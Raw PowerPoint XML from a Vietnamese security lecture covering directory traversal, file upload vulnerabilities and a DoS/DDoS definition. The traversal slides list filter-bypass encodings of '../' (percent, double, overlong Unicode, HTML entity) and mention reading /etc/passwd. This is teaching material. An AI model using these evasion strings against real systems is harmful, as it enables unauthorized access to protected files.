                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D13D29B-61CA-0464-D212-8FFE6B643AE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54</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7286C7E-9248-6074-491F-DD56D37A7F24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="171450" y="1271386"/>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Có thể dẫn đến việc truy cập trái phép vào các tệp cấu hình hệ thống (ví dụ: /etc/passwd) hoặc thực thi mã từ xa.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3668622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6720B-5965-185D-54C9-9E22BB36FE0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DEE1FBB-53A5-D918-90DE-FE87706E0A5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50C15D9F-2F93-D938-2B07-724760B31065}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="295478"/>
            <a:ext cx="9029700" cy="1951816"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
              <a:t>2.3.2. Cơ chế hoạt động của Directory Traversal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
              <a:t>2.3.2.1. Nguyên lý cơ bản:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51AB7C6A-9590-155B-D48C-8A56621ABAC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55</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43986F28-5574-3FC7-51B5-B9275F0D98E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="171450" y="2440503"/>
            <a:ext cx="8915400" cy="2157000"/>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Dựa trên việc thao túng chuỗi đường dẫn để "di chuyển" lên các thư mục cha.</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 Sử dụng ký tự đặc biệt như ../ (Unix/Linux)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hoặc ..\ (Windows) để di chuyển lên một cấp thư mục.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4206705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8AF53-35DC-182D-ED42-E0CDF221BBE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ABB8AD7-278D-0F24-9D9F-A590CCBC9E3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338816CB-78CF-0412-E146-730D12128A85}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="295478"/>
            <a:ext cx="8629650" cy="1305486"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
              <a:t>2.3.3. Các kỹ thuật bypass phổ biến</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="vi-VN" spc="-20" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4BF37D1-D483-12AE-0BCF-409D3EF6437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56</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{478ED5EE-E3DC-8C7C-C011-5FFCF7874A6A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="92161" y="948221"/>
            <a:ext cx="8915400" cy="41062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•URL Encoding (Percent Encoding): Sử dụng encoding cơ bản (ví dụ: %2e%2e%2f)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Double Encoding (%252e%252e%252f) để che giấu chuỗi ../.</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 Unicode Encoding: Sử dụng các biểu diễn Unicode của ../ (ví dụ: %c0%ae%c0%ae%c0%af).</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 HTML Entity Encoding: Sử dụng các thực thể HTML (ví dụ: &amp;period;&amp;period;&amp;sol;).</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="665735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AC08-8479-2151-3049-1B8FBBCFE72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505C6D-5657-D798-6D92-3D6FE14F6B7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C13EB487-818C-74B7-26D3-3FDFDF2ED67E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="295478"/>
            <a:ext cx="8629650" cy="1305486"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
              <a:t>2.3.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
              <a:t>. File Upload Vulnerability</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="vi-VN" spc="-20" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DE2C6CE-0073-4FE1-1531-D80DD31437F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57</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CAF3D02-0A65-1820-435B-18E8DB02FC8C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1795462" y="1111460"/>
            <a:ext cx="5553075" cy="4533900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1268953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07DF8-0793-AD57-00D6-46D51E01313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D0B2879-24EE-4C0C-727C-467479DE8F3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995EE306-23E2-E470-4CD9-EBF583CE091A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="295478"/>
            <a:ext cx="8629650" cy="1305486"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
              <a:t>2.3.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
              <a:t>. Các kỹ thuật bypass phổ biến</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="vi-VN" spc="-20" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1CBEC8D-E995-67EF-36A0-380CED05A83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58</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11785829-C46A-0077-3EE4-F615E232BC09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="92161" y="948221"/>
            <a:ext cx="8915400" cy="41062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•URL Encoding (Percent Encoding): Sử dụng encoding cơ bản (ví dụ: %2e%2e%2f)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Double Encoding (%252e%252e%252f) để che giấu chuỗi ../.</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 Unicode Encoding: Sử dụng các biểu diễn Unicode của ../ (ví dụ: %c0%ae%c0%ae%c0%af).</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 HTML Entity Encoding: Sử dụng các thực thể HTML (ví dụ: &amp;period;&amp;period;&amp;sol;).</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="746378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D5CE3-B336-A371-DE7D-0EC0CA01DC4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D969F8A-DAD6-9D13-4E3E-76EF75DDF3CC}"/>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C4366537-FB21-8958-179D-7E44F7BB7E2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="377911" y="266700"/>
            <a:ext cx="8629650" cy="3244478"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
              <a:t>.Tấn công từ chối dịch vụ (DoS/DDoS)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="pt-BR" spc="-20" dirty="0"/>
              <a:t>2.4.1. DoS/DDoS là gì?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pt-BR" spc="-20" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="vi-VN" spc="-20" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9991750-CD50-F684-546F-0DA9BC8B8373}"/>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59</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E667ABAE-3CC4-2610-DA95-330D2578DD86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2225315"/>
            <a:ext cx="8915400" cy="343940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Định </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>nghĩa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Là nỗ lực làm quá tải máy chủ, mạng lưới hoặc ứng dụng mục tiêu bằng cách gửi một lượng lớn lưu lượng truy cập hoặc yêu cầu từ một nguồn duy nhất (một máy tính/địa chỉ IP).</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Làm cạn kiệt tài nguyên (băng thông, CPU, bộ nhớ) của nạn nhân, khiến hệ thống không thể xử lý các yêu cầu hợp pháp, dẫn đến gián đoạn dịch vụ cho người dùng.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4264400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95478"/>
            <a:ext cx="7051040" cy="659155"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Bốn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tính</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>chất</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bổ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> sung: </a:t>
            </a:r>
            <a:endParaRPr spc="-25"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a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="535940" y="1165351"/>
            <a:ext cx="6106160" cy="272125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Authenticity (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Tính</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>xác</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>thực</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>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Reliability (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Tính</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>đáng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> tin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>cậy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>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Accountability (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Tính</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>trách</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>nhiệm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>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Non-repudiation (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Tính</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>không</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>thể</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>chối</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>bỏ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
            <a:endParaRPr sz="3000" dirty="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B7928-B1E6-77E2-572C-95477D197EB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6B5D9D2-9375-B4FD-3F9C-E2DA55E0A3B1}"/>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318C5BC-13E2-12FE-E605-031A10A0370F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="377911" y="266700"/>
            <a:ext cx="8629650" cy="1951816"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" spc="-20" dirty="0"/>
              <a:t>2.4.1. DoS/DDoS là gì?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pt-BR" spc="-20" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="vi-VN" spc="-20" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92B048EA-7508-9008-8201-DDD6480C974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60</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1203D59B-EA69-7A79-15BC-D531CB0BB3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9700" y="1104900"/>
            <a:ext cx="6324600" cy="3798050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4193819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F383D-4710-FD04-819B-C662EA993F7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C6430AC-85D9-6F67-F9BC-B6CC9E0CBEF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57D44937-2129-A352-E0D8-97F0C4C77B5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="377911" y="266700"/>
            <a:ext cx="8629650" cy="659155"/>
          </a:xfrm>
